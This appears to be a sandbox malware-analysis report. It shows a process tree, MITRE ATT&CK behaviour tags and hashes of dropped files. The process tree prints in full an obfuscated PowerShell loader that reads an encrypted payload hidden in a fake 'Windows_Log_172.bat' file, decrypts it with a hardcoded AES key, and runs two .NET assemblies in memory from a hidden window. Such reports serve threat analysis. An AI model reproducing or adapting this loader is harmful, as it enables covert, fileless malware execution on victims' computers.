C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OizxnO3/pdWJ2fJPn6JfWHEAeJ8e9YmWGBkF1RD8gB4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1hDsCU064fe3nz1n2J+tA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BuVAi=New-Object System.IO.MemoryStream(,$param_var); $nTyYw=New-Object System.IO.MemoryStream; $UaJSA=New-Object System.IO.Compression.GZipStream($BuVAi, [IO.Compression.CompressionMode]::Decompress); $UaJSA.CopyTo($nTyYw); $UaJSA.Dispose(); $BuVAi.Dispose(); $nTyYw.Dispose(); $nTyYw.ToArray();}function execute_function($param_var,$param2_var){ $UcolZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iAUtD=$UcolZ.EntryPoint; $iAUtD.Invoke($null, $param2_var);}$QWHqr = 'C:\Users\Admin\AppData\Roaming\Windows_Log_172.bat';$host.UI.RawUI.WindowTitle = $QWHqr;$RtxIM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QWHqr).Split([Environment]::NewLine);foreach ($igBOM in $RtxIM) { if ($igBOM.StartsWith('RgLhaxlcPBQqpmRoVUam')) { $EeOca=$igBOM.Substring(20); break; }}$payloads_var=[string[]]$EeOca.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "8⤵PID:3240
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3148
-
-
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5012
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2832 -ip 28321⤵PID:1780
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD58ba8fc1034d449222856ea8fa2531e28
SHA17570fe1788e57484c5138b6cead052fbc3366f3e
SHA2562e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2
SHA5127ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b
-
Filesize
152B
MD50c705388d79c00418e5c1751159353e3
SHA1aaeafebce5483626ef82813d286511c1f353f861
SHA256697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d
SHA512c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f
-
Filesize
152B
MD50d84d1490aa9f725b68407eab8f0030e
SHA183964574467b7422e160af34ef024d1821d6d1c3
SHA25640c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e
SHA512f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00
-
Filesize
5KB
MD583e506b90ab01134a49d1c39f81435a4
SHA1313ab67404fef224ba69c3690819f6ec838cfdb7
SHA256e934697cff1c479a14fefb6b7d30c45767c57b76f59e8c82fd20dfb176062a75
SHA512bd7b09b8d7463ab1b44d6e7315ada34a5794a54709ad8912f1e840b2023f54e95a13c21bec73662d5eaf9273a5c8ab9abe98a5e8a291e37b420eef6d3deb2e0d
-
Filesize
6KB
MD53abf936b2a2f2edd91e713b4a5d33b97
SHA1bfadcecc9566777179ea62a934b216abd4e66b30
SHA256ee183117529cc34604c75321e615018e52515f8ec77a8e67aa7d5a79e82d70de
SHA51272d8437e336c7d2cb116deb59bebef5d12a92f40dd4bf40b21b8cb62902e372d92e24d3fdee065a6a56566c77ccc9e467374691474ba2f7a6a7cea2774e022ce
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
8KB
MD5f83f1a3f4a7906ed93685e99de3e48e5
SHA135ed7e2a0070b7e6d0e3bef6b9f438e3766af9ff
SHA2568e0016cbbe024c2a41e839ccf172cf494ba734f49c726557a219f7d7a269c412
SHA51274459300b7754b229bff4112216ee76a00853cbc4720ec3eb2806f6ccac58820edfda56949536296707ad0eb7a52cb22cf3b5d8fd07eefedd3a4787830e6a354
-
Filesize
8KB
MD5a8d9fa260268d0aeef5c604ce35c9c5a
SHA12c6e5216c65c9364a36e21b5b7fc8db5ff18fa5c
SHA256138d72817b6d39a6252ff82a6372f38c601cd48fa2b1cbafdfb41fbecc450275
SHA512185ce2947efa77a78ce0ed9523ec7cc6e86f121c96e5e857a4d7cc9c1caa5f99ceb6a7ba338e76c1e749077aadc0cd93d760b6365693abcffa09fe2f5853417e
-
Filesize
18KB
MD51314d6b12ac057e167c1734363b8d32d
SHA1f54e69b17fb65b8da661c6404eb48ec217639270
SHA2566fdc5fca629f98db66a207b28ccd11df1d8698539e273082550b7f9eab5e3347
SHA5120b87e2ad7adc9bc31cf58b4f705f329250185799d99a2ba0d5a83f623dd5f00eb51e38518a9d6ae16868aadc334c69c7d34eacc4a488dfc6303372f5331458ca
-
Filesize
18KB
MD52a1fdb89cf408566ad184e42e71bb123
SHA12f834624e56b5082a6a25a88e3d915cbfbc3755c
SHA256a7f4944b7fa7efb91706f53d6694c619e5f165402b59630c4471513c8e1d515d
SHA5120cfd3a5f047f855186fb03cab9f1ae7595225a1568061a03f14880e5093b82dda05729af4289b6572c833a192bf512fcf6d3901f066666ea3fda248d379ca0de
-
Filesize
21KB
MD5a5c46224f3aa8c927796932b28d119b4
SHA107988cd548792010638e409431cfd55fbd16ce72
SHA2562e9554fcb56fa5bbf482a3974ff32a7c7d55ea0bb619bcb1a132d5cacc5f88e8
SHA5128a51e69ebfba35973671060be512dc0f4018d871626168379d191366a4ccc878514209914fa343d0fe92052a78b53ee9333d948c647eaee3ef4e2e5d75c62b63
-
Filesize
62B
MD548a4d8d2f59528ab75380faa39981ca7
SHA1aaba2693e7c957bcdf02b95c96348f57dfde0da6
SHA2567dc95e5d061697cc48611533328a01f7a69981ff6bd4c86581c98df867a558a2
SHA512ae8e0f246aab54ebad63bde7dd3594673f92ecd560d047e68a01a731fcb4efbc5625ea36b6b4f0ed90647cae9ed4c8744df0fdf6c4a2c28a467382f29a71616e
-
Filesize
422B
MD528194258aa09be52f6767e389194ef1d
SHA1d7ede25b3ebd83a084cff22ae1ad4f7612a99eb0
SHA256f02fe5951dc207722da607c087c4222067df5ca126687541f3736130e166efbc
SHA512eec2fc47c9fa340c17a3ff5fb5ffe0abe3ffe1966da131435ca9bcd9b100f2cacf60039969ee4f8e8ea0340d74b8772f9205e57b9a2c83bfdd2ea49c7e5b741c
-
Filesize
12.8MB
MD5189e42d1a681c3b07c7f92d247c214b0
SHA18b96bb15ccb0d433b07b5eadeb5e2a05157d5d99
SHA256ba7e850b945f72b85cd39d8fc5f6571962ccdfbba5fbda12fc2794b241dce9fd
SHA512d2acb262d4c1b5fcd63950b3c6928701d6a3314d63e63a243e2df8908b746d7649bf8d3b2b6dd0dc6f39c483bead6516260a7d1e201685eef112134833a95e24
-
Filesize
74B
MD5b3be17a14609d812602af67da8b7acc2
SHA1e1fcc3e3989ee6846694eba252622a336ce63795
SHA256f6cb1a4b508b1650cc1eaa607f545e50967157eef4f676de39836f2806d63b81
SHA512780a624a79bb3b293d83017595f709dd9fdc9e645f9c8bc5102aacaaad89a622e6a0dae9ea30fc3679378f6fe4afe34937f4909594c32351ee831917e8b0c1a7
-
Filesize
340B
MD56943c2eb7e78b8b8cb8171b940de20f2
SHA1e428c6dc0ffc17ab70178765e0bcb23dc0c12b8a
SHA256eb79d4bf846dfbd540085f0972658373f26709f281dfb88ad461f9df03d83095
SHA5121d628f3c5ac6e41ed14cc0069bde0278248e32c77e2e111bc842a71ba62d52913b47fb29402ce79b3d0880b6b5763b0d9906d6fb65bcfdf33103aefa0044552b
-
Filesize
155KB
MD545f7e10fb33d48463a55c89d40d4824a
SHA1b95ef1efdb8f79c468cd4cdcd85c8dd54087d9e2
SHA2567f37dbc61973ca542c89303b1df4f33ccc5ac442a16f497b115236bb58664d2f
SHA51243ad9acb9e43063a2d83045a24ff24ea7e211c05cdfc2b202f5cf1bd4e73ee9a134802c9aec22e7b941d4eec905055426b313ea30c7a55a6bb2ca467e77325ad
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
115B
MD5b2f9e9363d5230b504c727b66c8f899a
SHA1ca002f96780145e6bdf6efea6d08a4f3997f4769
SHA256658a5212102e7582c463120ff34a0873c21dbae015a2e048e36ecdbf9fb4137b
SHA51204a8c7cc5d73ca21e96de1f88a02a6a4a5a71d74b0b5a47ad376bf0b3dea27ced75036819d0fea8994331fe95150eaff9c6c1fbb8199e8d336b6b378983d4c28
-
Filesize
115B
MD5d58fbbe00f10ac2f1c10caeadc86cd35
SHA1a4c82ac805ab54686f8f14a1f7b28eb6c2675b9f
SHA25631ba666c8effdfb73401edb4edec3ffad73f847dfab9b2ea32b1476127ffb6f9
SHA51206ba02dd9bc8bd8cbd09ae073257fd081f6e5b3e30524b73c868a10e78ac50dec70d0ee75c5d0fae7843ec12ebe6aad14a5fb001e0c1c6463da26ec53d325ce9